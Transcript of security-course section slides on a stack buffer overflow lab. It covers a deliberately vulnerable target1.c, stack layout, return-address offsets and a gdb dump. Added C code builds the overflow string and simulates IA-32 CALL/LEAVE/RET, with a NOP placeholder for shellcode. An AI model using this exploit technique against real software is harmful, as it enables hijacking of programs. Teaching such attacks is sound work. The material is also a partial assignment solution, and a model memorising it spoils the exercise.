CS 155 Section 1 PP1 - PowerPoint PPT Presentation

About This Presentation
Title:

CS 155 Section 1 PP1

Description:

Push ebp : saves previous frame pointer. Copy sp into fp : ebp = esp. The new AR's frame pointer will be the previous value of the stack pointer ... – PowerPoint PPT presentation

Slides: 10
Provided by: elizabet47

Transcript and Presenter's Notes


1
CS 155 Section 1: PP1
  • Eu-Jin Goh

2
Setting up Environment
  • Demo

3
target1.c
    #include <string.h>

    int foo(char *arg, char *out)
    {
      strcpy(out, arg);       /* unbounded copy: nothing checks arg against sizeof(buf) */
      return 0;
    }

    int main(int argc, char *argv[])
    {
      char buf[64];
      if (argc != 2)
        return 1;             /* body of the if is not shown on the slide; assumed to bail out */
      foo(argv[1], buf);
      return 0;
    }

4
Stack in target1 layout (higher addresses first)
  • argv[1] -> "<shellcode><buf's addr>"
  • argv[0] -> "/tmp/target1"
  • argc
  • ra to which main() will return
  • fp (saved ebp) for main()'s stack frame
  • buf[64]
  • ptr to buf (out)        // args to foo()
  • ptr to argv[1] (arg)    // args to foo()

5
sploit1
  • Need:
    • Location of the return address
      • addr on the stack of the ra to overwrite
      • need main()'s ra (not foo()'s)
    • Address of the buffer (buf in target1)
      • the address we want to force the program to jump to
    • Distance between the buffer and the ra
      • size of the overflow buffer

6
Buf addr
  • addr of the target1 buf depends on the exploit's overflow
    buffer size
  • since the exploit string (argv[1]) lives above target1's buf
    on the stack: a longer argv[1] pushes main()'s frame, and buf
    with it, to lower addresses
  • Once the exploit buffer size is fixed, the addr of target1's
    buf won't change.

7
Details
  • Size of overflow buffer
    • buf addr = 0x9ffffb80
    • reg ebp  = 0x9ffffbc8
    • Difference is 0x48 = 72
    • Buffer size = 72 + 4 (saved ebp) + 4 (ra) + 1 (NUL) = 81
    (absolute addresses differ between runs with different argv[1]
    sizes; only the difference is used here)
  • Addr of buf (with the 81-byte exploit string)
    • buf = 0x9ffffe60

8
Crafting the exploit string
  • Want the target to jump to the start of buf, so
    place the shellcode (size 45 bytes) at the start of
    the string
  • ra exists at offset 76
  • need exploit_string[76..79] to contain the addr of
    target1's buf (0x9ffffe60), little-endian: 60 fe ff 9f
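The construction from slides 5 through 8 carried through in code, as an added example (it is not code from the section or from the CS 155 project): the 45-byte shellcode is replaced by a constructed NOP filler, and the buffer address (0x9ffffe60), the ra offset (76) and the total length (81) are the numbers quoted on the slides. Besides laying the bytes out it applies the two checks that decide whether the overflow reaches the ra slot at all: strcpy() stops at the first NUL, so neither the shellcode nor the injected address may contain one.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values from the slides: target1's buf lives at 0x9ffffe60 once the exploit
   string is 81 bytes long, and main()'s ra is 76 bytes past the start of buf. */
#define TARGET_BUF_ADDR 0x9ffffe60u
#define RA_OFFSET       76
#define EXPLOIT_LEN     81          /* 72 + 4 (saved ebp) + 4 (ra) + 1 (NUL) */
#define SHELLCODE_LEN   45

/* IA-32 is little-endian: least significant byte at the lowest address. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Fill out[0..EXPLOIT_LEN-1] with: shellcode, 'A' filler up to the ra slot
   (bytes 72..75 of it land in the saved-ebp slot), buf_addr at offset 76,
   terminating NUL.  Returns 0 on success; -1 if the shellcode would run into
   the ra slot; -2 if the shellcode contains a NUL; -3 if the address itself
   contains a NUL byte.  In the last two cases strcpy() would stop early and
   the overflow would never reach main()'s ra. */
int build_exploit(unsigned char *out, const unsigned char *sc, size_t sc_len,
                  uint32_t buf_addr)
{
    if (sc_len > RA_OFFSET)
        return -1;
    for (size_t i = 0; i < sc_len; i++)
        if (sc[i] == 0)
            return -2;
    for (int i = 0; i < 4; i++)
        if (((buf_addr >> (8 * i)) & 0xff) == 0)
            return -3;
    memset(out, 'A', EXPLOIT_LEN - 1);   /* filler between shellcode and ra */
    memcpy(out, sc, sc_len);             /* shellcode at the start of buf */
    put_le32(out + RA_OFFSET, buf_addr); /* replaces main()'s ra with &buf */
    out[EXPLOIT_LEN - 1] = '\0';         /* strcpy() stops here */
    return 0;
}

/* How many bytes strcpy() will actually copy into buf (up to the first NUL).
   Must be 80 for the copy to cover the whole ra slot. */
size_t copied_length(const unsigned char *s)
{
    return strlen((const char *)s);
}

/* The 4-byte value that lands in the ra slot. */
uint32_t ra_written(const unsigned char *s)
{
    return get_le32(s + RA_OFFSET);
}

/* Builds the slides' exploit string with a constructed stand-in for the
   shellcode (45 NOP bytes, not real shellcode; it only has to be NUL-free
   and 45 bytes long here).  Returns the string, or NULL on failure. */
const unsigned char *demo_exploit(void)
{
    static unsigned char sc[SHELLCODE_LEN];
    static unsigned char sploit[EXPLOIT_LEN];
    memset(sc, 0x90, sizeof sc);
    return build_exploit(sploit, sc, sizeof sc, TARGET_BUF_ADDR) == 0 ? sploit : NULL;
}

int main(void)
{
    const unsigned char *sploit = demo_exploit();
    if (sploit == NULL)
        return 1;
    /* sploit would now be handed to /tmp/target1 as argv[1] (slide 4). */
    printf("strcpy copies %zu bytes; ra slot <- 0x%08x\n",
           copied_length(sploit), ra_written(sploit));
    return 0;
}
```

The -2 and -3 cases are the usual reason a first attempt "does nothing": the copy silently truncates before the ra slot and main() returns normally. Real shellcode for this target is written to avoid NUL bytes for exactly that reason.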

9
Hints
  • Various ways of seizing program flow control
    without overwriting the return address
  • Learn what registers esp and ebp point to during the
    stages of program execution
  • Learn what happens to registers and memory during
    the LEAVE and RET instructions

10
IA-32 review
  • esp = Stack Pointer (SP): points to the top of the
    stack (the lowest memory address in use)
    • In general an SP points either to the last used word
      on the stack or to the next available word (implementation
      dependent); on IA-32, PUSH decrements esp by 4 and then
      stores, so esp points to the last word pushed
  • ebp = Frame Pointer (FP): points to a fixed location
    within an activation record (stack frame)
    • If the saved ebp for some stack frame is stored at addr X,
      then the saved eip (return address) for that frame is
      stored at addr X + 4
    • Used to reference local vars and parameters, since the
      distance from those to the frame pointer will not change,
      whereas the distance from those to the stack pointer will
      (as other functions are called and the stack pointer is
      decremented)
  • eip = instruction pointer (its saved copy on the stack is
    the ra)
    • The instruction pointer (EIP) register contains the
      offset in the current code segment of the next
      instruction to be executed.

11
More IA-32 review
  • When CALL-ing procedure p():
    • Push eip = the return address (ra) (done by the CALL
      instruction itself)
    • Push ebp: saves the previous frame pointer (p()'s prologue)
    • Copy sp into fp: ebp = esp
      • The new AR's frame pointer will be the previous
        value of the stack pointer
    • Advance sp (esp) for allocations on the stack (that
      is, decrement it)
  • When LEAVE-ing procedure p():
    • This process is reversed
    • Load ebp into esp
    • Restore ebp from the stack (pop)

12
Interaction between EIP, EBP, ESP
  • During CALL, the value of the eip register (the address of
    the instruction after the CALL) is pushed onto the stack
  • Before RET, the programmer (or compiler) must make sure that
    the stack pointer (esp) is pointing to the saved eip on the
    stack; LEAVE does this via:
    • Move contents of ebp into esp
    • Pop the saved ebp (this increments esp by 4 and restores
      the caller's frame pointer)
    • esp should now point to (contain the addy of) the saved eip
  • RET pops the word at [esp] into the eip register, and
    execution continues at that address
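The CALL / prologue / LEAVE / RET sequence from the last three slides, as an added model that is not code from the section: a small simulator of the IA-32 stack (256 bytes of memory plus esp, ebp and eip, with little-endian 32-bit pushes and pops) runs main()'s frame as laid out on slide 7, a 64-byte buf 72 bytes below the saved ebp, copies an input into it with no bounds check, and reports which address RET finally loads into eip. The stack addresses are chosen to resemble the slides' gdb dump; the code addresses (main at 0x08048400, return address 0x08048005) are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy model of the IA-32 stack: model addresses resemble the slides' dump. */
#define STACK_BASE  0x9ffffe00u
#define STACK_BYTES 256u
#define STACK_TOP   (STACK_BASE + STACK_BYTES)

#define CALLER_RET  0x08048005u   /* assumed: instruction after the CALL to main */
#define MAIN_ADDR   0x08048400u   /* assumed: address of main() */
#define FRAME_SIZE  72            /* slide 7: buf starts 72 bytes below the saved ebp */

typedef struct {
    uint8_t  mem[STACK_BYTES];
    uint32_t esp, ebp, eip;
} cpu_t;

/* 32-bit little-endian loads and stores, as IA-32 does them. */
static uint32_t rd32(const cpu_t *c, uint32_t a)
{
    const uint8_t *p = &c->mem[a - STACK_BASE];
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr32(cpu_t *c, uint32_t a, uint32_t v)
{
    uint8_t *p = &c->mem[a - STACK_BASE];
    p[0] = (uint8_t)(v & 0xff);         p[1] = (uint8_t)((v >> 8) & 0xff);
    p[2] = (uint8_t)((v >> 16) & 0xff); p[3] = (uint8_t)((v >> 24) & 0xff);
}

/* PUSH decrements esp by 4 and then stores; POP loads and then adds 4. */
static void push(cpu_t *c, uint32_t v) { c->esp -= 4; wr32(c, c->esp, v); }
static uint32_t pop(cpu_t *c) { uint32_t v = rd32(c, c->esp); c->esp += 4; return v; }

/* CALL: push the return address, jump to the callee. */
void op_call(cpu_t *c, uint32_t target, uint32_t ret) { push(c, ret); c->eip = target; }
/* Callee prologue: push ebp; mov ebp, esp; sub esp, frame. */
void op_prologue(cpu_t *c, uint32_t frame) { push(c, c->ebp); c->ebp = c->esp; c->esp -= frame; }
/* LEAVE: mov esp, ebp; pop ebp.  Afterwards esp points at the saved eip. */
void op_leave(cpu_t *c) { c->esp = c->ebp; c->ebp = pop(c); }
/* RET: pop the word at [esp] into eip. */
void op_ret(cpu_t *c) { c->eip = pop(c); }

/* Call main, build its frame, copy n bytes of s into buf at ebp-72 with no
   bounds check (what strcpy does), then LEAVE/RET.  Returns the eip that RET
   loads; *buf_out receives buf's model address. */
uint32_t run_main_with_input(const uint8_t *s, size_t n, uint32_t *buf_out)
{
    cpu_t c;
    memset(&c, 0, sizeof c);
    c.esp = STACK_TOP;                 /* empty stack */
    c.ebp = 0x9fffff00u;               /* assumed caller frame pointer */
    c.eip = 0x08048000u;               /* assumed caller code address */
    op_call(&c, MAIN_ADDR, CALLER_RET);
    op_prologue(&c, FRAME_SIZE);
    uint32_t buf = c.ebp - FRAME_SIZE;
    if (buf_out) *buf_out = buf;
    for (size_t i = 0; i < n && buf + i < STACK_TOP; i++)   /* unbounded copy */
        c.mem[buf + i - STACK_BASE] = s[i];
    op_leave(&c);
    op_ret(&c);
    return c.eip;
}

/* buf's address in the model (what the slides read out of gdb). */
uint32_t model_buf_addr(void)
{
    uint32_t buf;
    run_main_with_input((const uint8_t *)"", 0, &buf);
    return buf;
}

/* eip that RET loads when the input is n bytes of 'A' filler with target
   written little-endian at bytes 76..79 (only the first n bytes are copied). */
uint32_t eip_after_overflow(size_t n, uint32_t target)
{
    uint8_t input[80];
    memset(input, 'A', sizeof input);
    input[76] = (uint8_t)(target & 0xff);         input[77] = (uint8_t)((target >> 8) & 0xff);
    input[78] = (uint8_t)((target >> 16) & 0xff); input[79] = (uint8_t)((target >> 24) & 0xff);
    return run_main_with_input(input, n > sizeof input ? sizeof input : n, NULL);
}

int main(void)
{
    uint32_t buf = model_buf_addr();
    printf("buf at 0x%08x, saved ebp at buf+72, ra slot at 0x%08x (buf+76)\n", buf, buf + 76);
    printf("10 bytes -> eip 0x%08x (normal return)\n", eip_after_overflow(10, buf));
    printf("76 bytes -> eip 0x%08x (only saved ebp clobbered)\n", eip_after_overflow(76, buf));
    printf("80 bytes -> eip 0x%08x (== buf)\n", eip_after_overflow(80, buf));
    return 0;
}
```

The model only follows eip, so the 76-byte case looks harmless here; in the real program the garbage now in ebp is loaded into esp by the caller's own LEAVE, which is one of the "ways of seizing control without overwriting the return address" that the hints slide alludes to.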

13
The stack (gdb dump taken inside foo(); higher addresses first)
    address      contents                meaning
    0x9ffffef8   0x9fffff9e              argv[1] -> 0x9fffff9e: SHELLCODE
    0x9ffffef4   0x9fffff91              argv[0] -> 0x9fffff91: "/tmp/target1"
    0x9ffffef0   2                       argc
    <SNIP>
    0x9ffffeb8   0x9fffff00              <--- main()'s envp argument: 0x9fffff00 holds NULL
    0x9ffffeb4   0x9ffffef4              <--- main()'s argv argument: points to argv[0] at 0x9ffffef4 (-> 0x9fffff91)
    0x9ffffeb0   2                       <--- main()'s argc argument
    0x9ffffeac   __libc_start_main+198   <--- ra of main(): what we want to overwrite (buf + 76)
    0x9ffffea8   0x9ffffec8              <--- fp: main()'s saved frame pointer (buf + 72)
    0x9ffffea4   0x9ffffef4              <--- the argv pointer again (-> 0x9ffffef4 -> 0x9fffff91)
    0x9ffffea0   _rtld_global            <--- garbage / alignment padding?
    0x9ffffe9c   ------ last word of buf ------
    <SNIP>
    0x9ffffe60   ------ beginning of buf ------
    0x9ffffe5c
    0x9ffffe58
    0x9ffffe54   0x9ffffe60              <--- foo()'s 2nd arg (out): points to the beginning of buf
    0x9ffffe50   0x9fffff9e              <--- foo()'s 1st arg (arg = argv[1]): points to the shellcode
    0x9ffffe4c   0x8048461               <--- ra in foo(): <main+78>